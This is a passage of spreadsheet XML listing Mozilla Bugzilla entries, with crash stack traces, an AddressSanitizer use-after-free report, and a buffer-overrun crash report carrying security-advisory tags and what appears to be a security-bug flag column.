      <c r="M1377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1377" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1377" t="inlineStr"/>
      <c r="Q1377" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1377" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1377" t="n">
        <v>1</v>
      </c>
      <c r="U1377" t="n">
        <v>0</v>
      </c>
      <c r="V1377" t="n">
        <v>51</v>
      </c>
      <c r="W1377" t="inlineStr">
        <is>
          <t>This bug is to track effort to obtain a staging release of Devedition, based on jamun.</t>
        </is>
      </c>
      <c r="X1377" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" t="n">
        <v>1200580</v>
      </c>
      <c r="B1378" t="inlineStr">
        <is>
          <t>2015-09-01 04:57:14 -0700</t>
        </is>
      </c>
      <c r="C1378" t="inlineStr">
        <is>
          <t>Crash in mozilla::DisplayItemClip::IntersectWith</t>
        </is>
      </c>
      <c r="D1378" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:02 -0700</t>
        </is>
      </c>
      <c r="E1378" t="n">
        <v>1</v>
      </c>
      <c r="F1378" t="n">
        <v>1</v>
      </c>
      <c r="G1378" t="n">
        <v>3</v>
      </c>
      <c r="H1378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1378" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1378" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1378" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1378" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1378" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1378" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1378" t="inlineStr">
        <is>
          <t>[adv-main43+] Fixed in bug 1181135, requires non-default pref</t>
        </is>
      </c>
      <c r="Q1378" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1378" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1378" t="n">
        <v>1</v>
      </c>
      <c r="U1378" t="n">
        <v>0</v>
      </c>
      <c r="V1378" t="n">
        <v>17</v>
      </c>
      <c r="W1378" t="inlineStr">
        <is>
          <t>When running a certain Gaia Integration tests with Mulet on an optimized build (debug and prod), we are getting the crash from below. To run the test, download latest Mulet and run the following command:
RUNTIME=/PATH/TO/MULET/firefox TEST_FILES=/PATH/TO/gaia/apps/system/test/marionette/pinning_the_web_test.js make test-integration
This crashes about 50% of the time on my Mac Pro. It is also crashing on Linux in c-i: https://treeherder.mozilla.org/logviewer.html#?job_id=2634427&amp;repo=b2g-inbound
* thread #1: tid = 0x3e4fa, 0x00000001043db9c9 XUL`mozilla::DisplayItemClip::IntersectWith(mozilla::DisplayItemClip const&amp;) + 409, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
  * frame #0: 0x00000001043db9c9 XUL`mozilla::DisplayItemClip::IntersectWith(mozilla::DisplayItemClip const&amp;) + 409
    frame #1: 0x00000001043e6e37 XUL`mozilla::ContainerState::ProcessDisplayItems(nsDisplayList*) + 903
    frame #2: 0x00000001043edd35 XUL`mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&amp;, mozilla::gfx::Matrix4x4 const*, unsigned int) + 8533
    frame #3: 0x000000010444b177 XUL`nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) + 999
    frame #4: 0x000000010447ca2c XUL`nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) + 4780
    frame #5: 0x000000010449c346 XUL`PresShell::RenderDocument(nsRect const&amp;, unsigned int, unsigned int, gfxContext*) + 1414
    frame #6: 0x0000000103a4393e XUL`mozilla::dom::CanvasRenderingContext2D::DrawWindow(nsGlobalWindow&amp;, double, double, double, double, nsAString_internal const&amp;, unsigned int, mozilla::ErrorResult&amp;) + 1374
    frame #7: 0x0000000103644fad XUL`mozilla::dom::CanvasRenderingContext2DBinding::drawWindow(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) + 1293
    frame #8: 0x0000000103a06eb1 XUL`mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) + 401
    frame #9: 0x000000010547ef9c XUL`js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) + 444
    frame #10: 0x000000010549082d XUL`Interpret(JSContext*, js::RunState&amp;) + 35629
    frame #11: 0x0000000105487cbd XUL`js::RunScript(JSContext*, js::RunState&amp;) + 381
    frame #12: 0x000000010547f3c5 XUL`js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) + 1509
    frame #13: 0x0000000105468042 XUL`js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) + 610
    frame #14: 0x00000001057f1fef XUL`JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) + 111
    frame #15: 0x0000000102c365b2 XUL`nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) + 5250
    frame #16: 0x000000010246c230 XUL`PrepareAndDispatch + 576
    frame #17: 0x000000010246b07b XUL`SharedStub + 91
    frame #18: 0x000000010241340a XUL`(anonymous namespace)::MessageLoopIdleTask::Run() + 58
    frame #19: 0x00000001024134a7 XUL`(anonymous namespace)::MessageLoopTimerCallback::Notify(nsITimer*) + 23
    frame #20: 0x0000000102467322 XUL`nsTimerImpl::Fire() + 994
    frame #21: 0x000000010245af47 XUL`nsTimerEvent::Run() + 215
    frame #22: 0x000000010245ee11 XUL`nsThread::ProcessNextEvent(bool, bool*) + 1041
    frame #23: 0x0000000102488301 XUL`NS_ProcessPendingEvents(nsIThread*, unsigned int) + 81
    frame #24: 0x000000010419d874 XUL`nsBaseAppShell::NativeEventCallback() + 116
    frame #25: 0x00000001041f7509 XUL`nsAppShell::ProcessGeckoEvents(void*) + 297
    frame #26: 0x00007fff8cc6ca01 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
    frame #27: 0x00007fff8cc5eb8d CoreFoundation`__CFRunLoopDoSources0 + 269
    frame #28: 0x00007fff8cc5e1bf CoreFoundation`__CFRunLoopRun + 927
    frame #29: 0x00007fff8cc5dbd8 CoreFoundation`CFRunLoopRunSpecific + 296
    frame #30: 0x00007fff8f3a356f HIToolbox`RunCurrentEventLoopInMode + 235
    frame #31: 0x00007fff8f3a32ea HIToolbox`ReceiveNextEventCommon + 431
    frame #32: 0x00007fff8f3a312b HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
    frame #33: 0x00007fff947de8ab AppKit`_DPSNextEvent + 978
    frame #34: 0x00007fff947dde58 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
    frame #35: 0x00000001041f6ae6 XUL`-[GeckoNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 86
    frame #36: 0x00007fff947d3af3 AppKit`-[NSApplication run] + 594
    frame #37: 0x00000001041f7c8c XUL`nsAppShell::Run() + 236
    frame #38: 0x0000000104ade349 XUL`nsAppStartup::Run() + 41
    frame #39: 0x0000000104b3748d XUL`XREMain::XRE_mainRun() + 3325
    frame #40: 0x0000000104b37835 XUL`XREMain::XRE_main(int, char**, nsXREAppData const*) + 645
    frame #41: 0x0000000104b37c43 XUL`XRE_main + 227
    frame #42: 0x0000000100001bfd firefox`main + 1773
    frame #43: 0x00000001000011b4 firefox`start + 52</t>
        </is>
      </c>
      <c r="X1378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" t="n">
        <v>938341</v>
      </c>
      <c r="B1379" t="inlineStr">
        <is>
          <t>2013-11-13 13:58:06 -0800</t>
        </is>
      </c>
      <c r="C1379" t="inlineStr">
        <is>
          <t>heap-use-after-free in libxul.so!nsEventListenerManager::HandleEventSubType</t>
        </is>
      </c>
      <c r="D1379" t="inlineStr">
        <is>
          <t>2024-05-30 08:30:16 -0700</t>
        </is>
      </c>
      <c r="E1379" t="n">
        <v>1</v>
      </c>
      <c r="F1379" t="n">
        <v>1</v>
      </c>
      <c r="G1379" t="n">
        <v>3</v>
      </c>
      <c r="H1379" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1379" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1379" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K1379" t="inlineStr">
        <is>
          <t>28 Branch</t>
        </is>
      </c>
      <c r="L1379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1379" t="inlineStr">
        <is>
          <t>[asan][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q1379" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1379" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1379" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T1379" t="n">
        <v>1</v>
      </c>
      <c r="U1379" t="n">
        <v>0</v>
      </c>
      <c r="V1379" t="n">
        <v>27</v>
      </c>
      <c r="W1379" t="inlineStr">
        <is>
          <t>Created attachment 831798
1C072E5F.html
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
==24554==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000255a58 at pc 0x7fb832e41778 bp 0x7fff0b8b91f0 sp 0x7fff0b8b91e8
READ of size 8 at 0x60c000255a58 thread T0
    #0 0x7fb832e41777 (libxul.so!nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*)+0x367)
	Line 268 of "../../../dist/include/mozilla/dom/CallbackObject.h"
    #1 0x7fb832e42516 (libxul.so!nsEventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*)+0xa36)
	Line 1038 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventListenerManager.cpp"
    #2 0x7fb832e33303 (libxul.so!nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, ELMCreationDetector&amp;, nsCxPusher*)+0x4d3)
	Line 325 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventListenerManager.h"
    #3 0x7fb832e325a9 (libxul.so!nsEventTargetChainItem::HandleEventTargetChain(nsTArray&lt;nsEventTargetChainItem&gt;&amp;, nsEventChainPostVisitor&amp;, nsDispatchingCallback*, ELMCreationDetector&amp;, nsCxPusher*)+0x829)
	Line 313 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventDispatcher.cpp"
    #4 0x7fb832e36274 (libxul.so!nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*)+0x2974)
	Line 605 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventDispatcher.cpp"
    #5 0x7fb833009c78 (libxul.so!nsGenericHTMLElement::Click()+0x718)
	Line 2738 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/html/content/src/nsGenericHTMLElement.cpp"
    #6 0x7fb83558dd50 (libxul.so!mozilla::dom::HTMLElementBinding::click(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitMethodCallArgs const&amp;)+0x30)
	Line 582 of "./HTMLElementBinding.cpp"
    #7 0x7fb83558d5da (libxul.so!mozilla::dom::HTMLElementBinding::genericMethod(JSContext*, unsigned int, JS::Value*)+0x68a)
	Line 4767 of "./HTMLElementBinding.cpp"
    #8 0x7fb837c257c7 (libxul.so!js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct)+0x5f7)
	Line 220 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/jscntxtinlines.h"
    #9 0x7fb837c1a70b (libxul.so!Interpret(JSContext*, js::RunState&amp;)+0x18c9b)
	Line 2502 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/vm/Interpreter.cpp"
    #10 0x7fb837c01993 (libxul.so!js::RunScript(JSContext*, js::RunState&amp;)+0x3f3)
	Line 420 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/vm/Interpreter.cpp"
    #11 0x7fb837c25a03 (libxul.so!js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct)+0x833)
	Line 482 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/vm/Interpreter.cpp"
    #12 0x7fb837c26778 (libxul.so!js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;)+0x568)
	Line 513 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/vm/Interpreter.cpp"
    #13 0x7fb83792bbd7 (libxul.so!JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*)+0x117)
	Line 4920 of "/builds/slave/m-in-l64-asan-0000000000000000/build/js/src/jsapi.cpp"
    #14 0x7fb83537f02f (libxul.so!mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMEvent&amp;, mozilla::ErrorResult&amp;)+0x23f)
	Line 36 of "./EventHandlerBinding.cpp"
    #15 0x7fb83365bc53 (libxul.so!nsJSEventListener::HandleEvent(nsIDOMEvent*)+0xab3)
	Line 58 of "../../../dist/include/mozilla/dom/EventHandlerBinding.h"
    #16 0x7fb832e41622 (libxul.so!nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*)+0x212)
	Line 960 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventListenerManager.cpp"
    #17 0x7fb832e42516 (libxul.so!nsEventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*)+0xa36)
	Line 1038 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventListenerManager.cpp"
    #18 0x7fb832e33303 (libxul.so!nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, ELMCreationDetector&amp;, nsCxPusher*)+0x4d3)
	Line 325 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventListenerManager.h"
    #19 0x7fb832e321de (libxul.so!nsEventTargetChainItem::HandleEventTargetChain(nsTArray&lt;nsEventTargetChainItem&gt;&amp;, nsEventChainPostVisitor&amp;, nsDispatchingCallback*, ELMCreationDetector&amp;, nsCxPusher*)+0x45e)
	Line 292 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventDispatcher.cpp"
    #20 0x7fb832e36274 (libxul.so!nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*)+0x2974)
	Line 605 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/events/src/nsEventDispatcher.cpp"
    #21 0x7fb8322c410b (libxul.so!nsDocumentViewer::LoadComplete(tag_nsresult)+0x91b)
	Line 997 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsDocumentViewer.cpp"
    #22 0x7fb83644079a (libxul.so!nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult)+0x5ca)
	Line 6776 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDocShell.cpp"
    #23 0x7fb83643da29 (libxul.so!nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult)+0x1499)
	Line 6573 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDocShell.cpp"
    #24 0x7fb83643df6c (libxul.so!non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult)+0xc)
	Line 6579 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDocShell.cpp"
    #25 0x7fb836490fbf (libxul.so!nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult)+0x47f)
	Line 1331 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsDocLoader.cpp"
    #26 0x7fb836490313 (libxul.so!nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult)+0x263)
	Line 865 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsDocLoader.cpp"
    #27 0x7fb83648dfaf (libxul.so!nsDocLoader::DocLoaderIsEmpty(bool)+0x7ef)
	Line 755 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsDocLoader.cpp"
    #28 0x7fb83648f528 (libxul.so!nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult)+0x5b8)
	Line 639 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsDocLoader.cpp"
    #29 0x7fb83648fdc9 (libxul.so!non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult)+0x9)
	Line 642 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsDocLoader.cpp"
    #30 0x7fb831a22d79 (libxul.so!nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult)+0x799)
	Line 688 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsLoadGroup.cpp"
    #31 0x7fb832b1c8b6 (libxul.so!nsDocument::DoUnblockOnload()+0x226)
	Line 7988 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/base/src/nsDocument.cpp"
    #32 0x7fb832b1c56b (libxul.so!nsDocument::UnblockOnload(bool)+0x55b)
	Line 7916 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/base/src/nsDocument.cpp"
    #33 0x7fb832afb232 (libxul.so!nsDocument::DispatchContentLoadedEvents()+0xb02)
	Line 4702 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/base/src/nsDocument.cpp"
    #34 0x7fb832b3fa0c (libxul.so!nsRunnableMethodImpl&lt;void (nsDocument::*)(), void, true&gt;::Run()+0x6c)
	Line 382 of "../../../dist/include/nsThreadUtils.h"
    #35 0x7fb835f7cba9 (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xaa9)
	Line 622 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #36 0x7fb835ea8cd1 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
	Line 251 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #37 0x7fb834a162d1 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x311)
	Line 85 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #38 0x7fb836084b53 (libxul.so!MessageLoop::Run()+0x1c3)
	Line 220 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #39 0x7fb8347eea4c (libxul.so!nsBaseAppShell::Run()+0x5c)
	Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #40 0x7fb8341f5a0e (libxul.so!nsAppStartup::Run()+0xbe)
	Line 267 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/components/startup/nsAppStartup.cpp"
    #41 0x7fb83174e655 (libxul.so!XREMain::XRE_mainRun()+0x1e05)
	Line 3976 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #42 0x7fb83174f58a (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
	Line 4044 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #43 0x7fb8317504bb (libxul.so!XRE_main+0x3ab)
	Line 4246 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #44 0x459dcd (firefox!main+0x94d)
	Line 275 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #45 0x7fb840e9776c (libc.so.6!__libc_start_main+0xec)
	Line 226 of "libc-start.c"
    #46 0x45934c (firefox!_start+0x28)
0x60c000255a58 is located 88 bytes inside of 128-byte region [0x60c000255a00,0x60c000255a80)
freed by thread T0 here:
    #0 0x44653b (firefox!realloc+0x5b)
	Line 95 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7fb83e04e65e (libmozalloc.so!moz_xrealloc+0xe)
	Line 84 of "/builds/slave/m-in-l64-asan-0000000000000000/build/memory/mozalloc/mozalloc.cpp"
previously allocated by thread T0 here:
    #0 0x446395 (firefox!malloc+0x55)
	Line 74 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7fb83e04e5c8 (libmozalloc.so!moz_xmalloc+0x8)
	Line 52 of "/builds/slave/m-in-l64-asan-0000000000000000/build/memory/mozalloc/mozalloc.cpp"
Shadow bytes around the buggy address:
  0x0c1880042af0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1880042b00: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1880042b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1880042b20: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880042b30: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
=&gt;0x0c1880042b40: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd
  0x0c1880042b50: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1880042b60: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1880042b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1880042b80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880042b90: 00 00 00 00 00 00 00 00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24554==ABORTING</t>
        </is>
      </c>
      <c r="X1379" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" t="n">
        <v>1221948</v>
      </c>
      <c r="B1380" t="inlineStr">
        <is>
          <t>2015-11-05 02:49:19 -0800</t>
        </is>
      </c>
      <c r="C1380" t="inlineStr">
        <is>
          <t>[Signature report] Use os pretty version in Operating System summary</t>
        </is>
      </c>
      <c r="D1380" t="inlineStr">
        <is>
          <t>2015-11-05 08:24:12 -0800</t>
        </is>
      </c>
      <c r="E1380" t="n">
        <v>1</v>
      </c>
      <c r="F1380" t="n">
        <v>1</v>
      </c>
      <c r="G1380" t="n">
        <v>4</v>
      </c>
      <c r="H1380" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1380" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1380" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1380" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1380" t="inlineStr"/>
      <c r="Q1380" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1380" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1380" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1380" t="n">
        <v>1</v>
      </c>
      <c r="U1380" t="n">
        <v>0</v>
      </c>
      <c r="V1380" t="n">
        <v>3</v>
      </c>
      <c r="W1380" t="inlineStr">
        <is>
          <t>Bug 1218751 added a new os_pretty_version field containing an enhanced platform version string. We want to use that in the Operating System summary.</t>
        </is>
      </c>
      <c r="X1380" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" t="n">
        <v>966021</v>
      </c>
      <c r="B1381" t="inlineStr">
        <is>
          <t>2014-01-30 14:29:58 -0800</t>
        </is>
      </c>
      <c r="C1381" t="inlineStr">
        <is>
          <t>memcpy buffer overrun when _cairo_truetype_index_to_ucs4 calls _cairo_dwrite_load_truetype_table</t>
        </is>
      </c>
      <c r="D1381" t="inlineStr">
        <is>
          <t>2015-02-25 21:52:54 -0800</t>
        </is>
      </c>
      <c r="E1381" t="n">
        <v>1</v>
      </c>
      <c r="F1381" t="n">
        <v>1</v>
      </c>
      <c r="G1381" t="n">
        <v>3</v>
      </c>
      <c r="H1381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1381" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K1381" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1381" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1381" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1381" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1381" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q1381" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1381" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1381" t="n">
        <v>1</v>
      </c>
      <c r="U1381" t="n">
        <v>1</v>
      </c>
      <c r="V1381" t="n">
        <v>27</v>
      </c>
      <c r="W1381" t="inlineStr">
        <is>
          <t>Created attachment 8368211
This is a wrapper to get some Javascript executed in an environment where nsIWebBrowserPrint can be used to generate a pdf
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Steps to reproduce:
Install the attached xpi (which creates an ugly Hello World top-level menu...sorry, I adapted one of your tutorials to get a simple reproduction).
On any web page (e.g., google's home page), select the Hello World menu item (which really attempts to generate a pdf of the page to c:\temp\problem.pdf).
(I'm using the FF 26.0 on 64-bit Windows 7 professional...32-bit version of FF, though.)
Crash report details:
AdapterDeviceID: 0x6778
AdapterVendorID: 0x1002
Add-ons: support%40lastpass.com:3.0.12,printPages2Pdf%40reinhold.ripper:0.1.9.3,helloworld%40xulschool.com:0.1,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:26.0
AvailablePageFile: 20080398336
AvailablePhysicalMemory: 5977272320
AvailableVirtualMemory: 3804106752
BuildID: 20131205075310
CrashTime: 1391120848
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1387205692
Notes: AdapterVendorID: 0x1002, AdapterDeviceID: 0x6778, AdapterSubsysID: 21201028, AdapterDriverVersion: 8.922.0.0
Has dual GPUs. GPU #2: AdapterVendorID2: 0x8086, AdapterDeviceID2: 0x0162, AdapterSubsysID2: 05771028, AdapterDriverVersion2: 8.15.10.2712D2D? D2D+ DWrite? DWrite+ D3D10 Layers? D3D10 Layers+ 
ProductID: {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
ProductName: Firefox
